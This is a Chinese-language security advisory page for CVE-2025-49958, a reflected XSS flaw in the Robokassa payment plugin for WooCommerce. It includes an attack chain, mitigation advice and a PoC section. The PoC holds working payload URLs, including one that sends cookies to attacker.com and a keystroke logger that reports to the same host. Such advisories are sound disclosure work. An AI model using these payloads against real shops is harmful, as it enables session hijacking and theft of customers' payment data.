IPBUF安全漏洞报告
English
CVE-2025-49958 CVSS 7.1 高危

CVE-2025-49958 WordPress Robokassa插件反射型XSS漏洞

披露日期: 2025-10-22

漏洞信息

漏洞编号
CVE-2025-49958
漏洞类型
反射型XSS
CVSS评分
7.1 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Robokassa payment gateway for Woocommerce

相关标签

反射型XSSWordPress插件漏洞RobokassaWooCommerce支付漏洞跨站脚本攻击Web安全漏洞电子商务安全

漏洞概述

CVE-2025-49958是WordPress平台下Robokassa支付网关插件的一个高危安全漏洞。该漏洞类型为反射型跨站脚本攻击(Reflected XSS),存在于Web页面生成过程中对用户输入的不当处理。攻击者可以通过构造恶意链接,诱导用户点击后执行任意JavaScript脚本,从而窃取用户的会话cookie、劫持用户账户或进行其他恶意操作。该漏洞影响Robokassa payment gateway for Woocommerce插件从任意版本至1.8.6的所有版本。由于该插件用于处理WooCommerce电商平台的支付功能,漏洞被利用可能导致用户的支付信息和敏感数据泄露,对电商网站的安全运营构成严重威胁。

技术细节

该漏洞是由于Robokassa支付网关插件在处理用户输入时未对特殊字符进行适当的HTML转义或过滤。当用户提交包含恶意脚本的数据时,这些数据被直接反射到网页响应中而未经安全处理。攻击者可以在支付回调URL或其他用户可控的输入点注入JavaScript代码,如<script>alert(document.cookie)</script>。当受害者访问包含恶意载荷的链接时,浏览器会执行注入的脚本代码。反射型XSS与存储型XSS不同,恶意代码不会保存在服务器端,但仍然可以窃取用户敏感信息、操纵网页内容或进行钓鱼攻击。由于该插件处理支付流程,攻击者可能利用此漏洞获取支付相关的敏感信息或冒充合法用户进行操作。

攻击链分析

STEP 1
步骤1
攻击者识别目标网站使用的Robokassa支付网关插件版本
STEP 2
步骤2
攻击者构造包含恶意JavaScript代码的URL,利用插件未过滤的用户输入参数
STEP 3
步骤3
攻击者通过钓鱼邮件、社交工程或其他方式诱导受害者点击恶意链接
STEP 4
步骤4
受害者浏览器执行反射的恶意脚本,窃取Cookie或会话信息
STEP 5
步骤5
攻击者利用窃取的凭证劫持用户账户或进行非法支付操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-49958 PoC - Reflected XSS in Robokassa WordPress Plugin --> <!-- Basic XSS Payload --> https://target-site.com/?robokassa_param=<script>alert(document.cookie)</script> <!-- Cookie Stealing Payload --> https://target-site.com/?InvId=<script>document.location='https://attacker.com/steal?c='+document.cookie</script> <!-- Keylogger Payload --> https://target-site.com/?OutSum=<script>document.onkeypress=function(e){new Image().src='https://attacker.com/log?k='+String.fromCharCode(e.charCode)}</script> <!-- Using img tag for XSS --> https://target-site.com/?shp_item=<img src=x onerror=alert('XSS')> <!-- Using svg tag for XSS --> https://target-site.com/?shp_order=<svg onload=alert(document.domain)>

影响范围

Robokassa payment gateway for Woocommerce <= 1.8.6

防御指南

临时缓解措施
在官方修复版本发布前,可以通过Web应用防火墙(WAF)规则阻止包含<script>、<img>、<svg>等XSS特征字符的请求参数;临时禁用或替换该支付插件使用其他支付网关;加强对管理员账户的多因素认证;监控网站日志中的异常请求模式。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表